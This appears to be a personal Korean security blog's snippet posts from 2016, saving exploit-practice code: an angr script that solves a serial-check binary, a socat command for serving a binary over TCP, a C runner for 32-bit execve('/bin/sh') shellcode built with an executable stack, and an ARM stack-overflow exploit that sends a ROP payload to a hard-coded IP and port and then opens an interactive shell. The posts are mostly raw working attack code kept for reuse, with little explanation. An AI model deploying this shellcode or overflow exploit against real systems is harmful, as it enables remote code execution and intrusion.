2016.05.31 16:05

╰─$ cat anger.py 

import angr

p = angr.Project('/mnt/shared/serial', load_options={'auto_load_libs':False})

ex = p.surveyors.Explorer(find=(0x400e5c, ), avoid=(0x400e78,))

ex.run()

print ex.found[0].state.posix.dumps(0)

print ex.found[0].state.posix.dumps(1) 

 


Posted by k1rha
2016.05.31 08:55

socat TCP-LISTEN:포트,reuseaddr,fork EXEC:./바이너리

Posted by k1rha
2016.05.17 10:23

#gcc -o shellcode shellcode.c -m32 -z execstack


#include<string.h>

char shellcode[]="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

int main(){


int (*func)();

printf ("size : %d \n",strlen(shellcode));

func = shellcode;

func();


return 0;

}

 


Posted by k1rha
2016.05.06 12:33

쓸때마다 손으로 치기 귀찮으니 생각난김에 저장. 


출처 : https://rotlogix.com/2016/05/03/arm-exploit-exercises/

import socket  
import sys  
import struct  
import telnetlib


def exploit():  
    try:
        # Connect to target
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.174.90.177', 6666))
        print("[*] Connecting to target (!)")
        # Build payload
        payload = 'A' * 72
        payload += struct.pack("<I", 0x76EE012C)
        payload += struct.pack("<I", 0x7efff7f3)
        payload += 'BBBB'
        payload += struct.pack("<I", 0x76EC2BC8)
        payload += 'CCCC'
        payload += 'DDDD'
        payload += 'EEEE'
        payload += 'FFFF'
        payload += struct.pack("<I", 0x76e9ffac)
        print("[*] Sending Payload (!)")
        # Send payload
        s.sendall(payload)
        # Interact with the shell
        t = telnetlib.Telnet()
        t.sock = s
        t.interact()
    except socket.errno:
        raise

if __name__ == '__main__':  
    try:
        exploit()
    except KeyboardInterrupt:
        sys.exit(0)

 


Posted by k1rha